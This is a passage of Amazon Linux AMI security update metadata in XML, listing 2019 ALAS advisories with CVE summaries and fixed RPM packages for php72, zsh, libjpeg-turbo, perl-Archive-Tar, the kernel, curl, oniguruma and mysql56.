release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.21-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1285</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1285: medium priority package update for zsh</title><issued date="2019-09-13 22:56:00" /><updated date="2019-09-18 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-13259:
It was discovered that zsh does not properly validate the shebang of input files and it truncates it to the first 64 bytes. A local attacker may use this flaw to make zsh execute a different binary than what is expected, named with a substring of the shebang one.
1626184:
CVE-2018-13259 zsh: Improper handling of shebang line longer than 64
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13259" title="" id="CVE-2018-13259" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="zsh-html" version="5.0.2" release="33.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-html-5.0.2-33.18.amzn1.x86_64.rpm</filename></package><package name="zsh" version="5.0.2" release="33.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-5.0.2-33.18.amzn1.x86_64.rpm</filename></package><package name="zsh-debuginfo" version="5.0.2" release="33.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-debuginfo-5.0.2-33.18.amzn1.x86_64.rpm</filename></package><package name="zsh-html" version="5.0.2" release="33.18.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-html-5.0.2-33.18.amzn1.i686.rpm</filename></package><package name="zsh" version="5.0.2" release="33.18.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-5.0.2-33.18.amzn1.i686.rpm</filename></package><package name="zsh-debuginfo" version="5.0.2" release="33.18.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-debuginfo-5.0.2-33.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1286</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1286: medium priority package update for libjpeg-turbo</title><issued date="2019-09-13 22:58:00" /><updated date="2019-09-18 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14498:
get_8bit_row in rdbmp.c in libjpeg-turbo through 1.5.90 and MozJPEG through 3.3.1 allows attackers to cause a denial of service (heap-based buffer over-read and application crash) via a crafted 8-bit BMP in which one or more of the color indices is out of range for the number of palette entries.
1687424:
CVE-2018-14498 libjpeg-turbo: heap-based buffer over-read via crafted 8-bit BMP in get_8bit_row in rdbmp.c leads to denial of service
CVE-2018-11813:
libjpeg 9c has a large loop because read_pixel in rdtarga.c mishandles EOF.
1588803:
CVE-2018-11813 libjpeg: "cjpeg" utility large loop because read_pixel in rdtarga.c mishandles EOF
CVE-2018-11214:
An out-of-bounds read vulnerability has been discovered in libjpeg-turbo when reading one row of pixels of a PPM file. An attacker could use this flaw to crash the application and cause a denial of service.
1579980:
CVE-2018-11214 libjpeg: Segmentation fault in get_text_rgb_row function in rdppm.c
CVE-2018-11213:
An out-of-bound read vulnerability has been discovered in libjpeg-turbo when reading one row of pixels of a PGM file. An attacker could use this flaw to crash the application and cause a denial of service.
1579979:
CVE-2018-11213 libjpeg: Segmentation fault in get_text_gray_row function in rdppm.c
CVE-2018-11212:
A divide by zero vulnerability has been discovered in libjpeg-turbo in alloc_sarray function of jmemmgr.c file. An attacker could use this vulnerability to cause a denial of service via a crafted file.
1579973:
CVE-2018-11212 libjpeg-turbo: Divide By Zero in alloc_sarray function in jmemmgr.c
CVE-2016-3616:
The cjpeg utility in libjpeg allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or execute arbitrary code via a crafted file.
1319661:
CVE-2016-3616 libjpeg: null pointer dereference in cjpeg
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3616" title="" id="CVE-2016-3616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11212" title="" id="CVE-2018-11212" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11213" title="" id="CVE-2018-11213" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11214" title="" id="CVE-2018-11214" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11813" title="" id="CVE-2018-11813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14498" title="" id="CVE-2018-14498" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libjpeg-turbo-static" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-static-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-devel-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-debuginfo-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-utils-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="turbojpeg-devel" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-devel-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="turbojpeg" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="turbojpeg-devel" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-devel-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="turbojpeg" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-utils-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-static" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-static-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-debuginfo-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-devel-1.2.90-8.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1287</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1287: medium priority package update for perl-Archive-Tar</title><issued date="2019-09-13 22:59:00" /><updated date="2019-09-18 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-12015:
It was found that the Archive::Tar module did not properly sanitize symbolic links when extracting tar archives. An attacker, able to provide a specially crafted archive for processing, could use this flaw to write or overwrite arbitrary files in the context of the Perl interpreter.
1588760:
CVE-2018-12015 perl: Directory traversal in Archive::Tar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12015" title="" id="CVE-2018-12015" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Archive-Tar" version="1.92" release="3.6.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Archive-Tar-1.92-3.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1293</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1293: important priority package update for kernel</title><issued date="2019-09-25 23:01:00" /><updated date="2019-10-09 23:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14835:
A buffer overflow flaw was found in the way Linux kernel&#039;s vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host.
99999:
CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration
CVE-2019-14821:
An out-of-bounds access issue was found in the way Linux kernel&#039;s KVM hypervisor implements the Coalesced MMIO write operation. It operates on an MMIO ring buffer &#039;struct kvm_coalesced_mmio&#039; object, wherein write indices &#039;ring-&gt;first&#039; and &#039;ring-&gt;last&#039; value could be supplied by a host user-space process. An unprivileged host user or process with access to &#039;/dev/kvm&#039; device could use this flaw to crash the host kernel, resulting in a denial of service or potentially escalating privileges on the system.
1746708:
CVE-2019-14821 Kernel: KVM: OOB memory access via mmio ring buffer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821" title="" id="CVE-2019-14821" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835" title="" id="CVE-2019-14835" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.146-93.123.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.146-93.123.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.146" release="93.123.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.146-93.123.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1294</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1294: medium priority package update for curl</title><issued date="2019-09-30 20:56:00" /><updated date="2019-10-02 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5482:
Heap buffer overflow in the TFTP protocol handler in cURL 7.19.4 to 7.65.3.
1749652:
CVE-2019-5482 curl: heap buffer overflow in function tftp_receive_packet()
CVE-2019-5481:
Double-free vulnerability in the FTP-kerberos code in cURL 7.52.0 to 7.65.3.
1749402:
CVE-2019-5481 curl: double free due to subsequent call of realloc()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5481" title="" id="CVE-2019-5481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5482" title="" id="CVE-2019-5482" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.61.1" release="12.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.93.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.93.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.93.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.93.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.93.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.93.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.93.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.93.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.93.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.93.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.93.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.93.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1295</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1295: medium priority package update for oniguruma</title><issued date="2019-09-30 20:59:00" /><updated date="2019-10-02 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13225:
A NULL Pointer Dereference in match_at() in regexec.c in Oniguruma 6.9.2 allows attackers to potentially cause denial of service by providing a crafted regular expression. Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.
1728965:
CVE-2019-13225 oniguruma: null-pointer dereference in match_at() in regexec.c
CVE-2019-13224:
A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.
1728970:
CVE-2019-13224 oniguruma: use-after-free in onig_new_deluxe() in regext.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13224" title="" id="CVE-2019-13224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13225" title="" id="CVE-2019-13225" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="oniguruma-devel" version="5.9.6" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/oniguruma-devel-5.9.6-4.4.amzn1.x86_64.rpm</filename></package><package name="oniguruma" version="5.9.6" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/oniguruma-5.9.6-4.4.amzn1.x86_64.rpm</filename></package><package name="oniguruma-debuginfo" version="5.9.6" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/oniguruma-debuginfo-5.9.6-4.4.amzn1.x86_64.rpm</filename></package><package name="oniguruma-devel" version="5.9.6" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/oniguruma-devel-5.9.6-4.4.amzn1.i686.rpm</filename></package><package name="oniguruma-debuginfo" version="5.9.6" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/oniguruma-debuginfo-5.9.6-4.4.amzn1.i686.rpm</filename></package><package name="oniguruma" version="5.9.6" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/oniguruma-5.9.6-4.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1296</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1296: medium priority package update for mysql56</title><issued date="2019-09-30 21:00:00" /><updated date="2019-10-02 23:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2819:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Audit). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1732032:
CVE-2019-2819 mysql: Server: Security: Audit unspecified vulnerability (CPU Jul 2019)
CVE-2019-2740:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: XML). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1732000:
CVE-2019-2740 mysql: Server: XML unspecified vulnerability (CPU Jul 2019)
CVE-2019-2739:
